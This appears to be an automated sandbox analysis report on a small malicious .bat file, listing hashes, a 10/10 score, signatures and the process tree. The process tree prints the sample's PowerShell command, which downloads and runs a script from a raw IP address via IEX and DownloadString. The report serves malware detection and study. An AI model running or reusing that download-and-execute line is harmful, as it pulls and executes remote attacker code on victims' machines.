Analysis
-
max time kernel
125s -
max time network
153s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
15-05-2020 19:19
Static task
static1
Behavioral task
behavioral1
Sample
b692cd395a2db4aacd53de584ee06ea0.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
b692cd395a2db4aacd53de584ee06ea0.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
b692cd395a2db4aacd53de584ee06ea0.bat
-
Size
215B
-
MD5
7b613efb2eb2240a79c12ff83b16d370
-
SHA1
c74e994acea6c088e0590c14a99ccada44dd7c12
-
SHA256
ace21c38bbf5a81a0646d2f3d272bf7b43c84e248c3524bdcbb855c8594a0d6e
-
SHA512
7242a8a1d96558ffbc16b91b9a1dbd25a60396da43c9d46b0a57eecceee262bdde40cd44c507a122ee9567882de40c1c75514048b241e62181c0e5a67ea72024
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/b692cd395a2db4aacd53de584ee06ea0
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1544 1784 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 1544 WerFault.exe Token: SeBackupPrivilege 1544 WerFault.exe Token: SeDebugPrivilege 1544 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 1544 WerFault.exe 1544 WerFault.exe 1544 WerFault.exe 1544 WerFault.exe 1544 WerFault.exe 1544 WerFault.exe 1544 WerFault.exe 1544 WerFault.exe 1544 WerFault.exe 1544 WerFault.exe 1544 WerFault.exe 1544 WerFault.exe 1544 WerFault.exe 1544 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b692cd395a2db4aacd53de584ee06ea0.bat"1⤵PID:1636
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b692cd395a2db4aacd53de584ee06ea0');Invoke-IKBCFDVD;Start-Sleep -s 10000"2⤵PID:1784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1544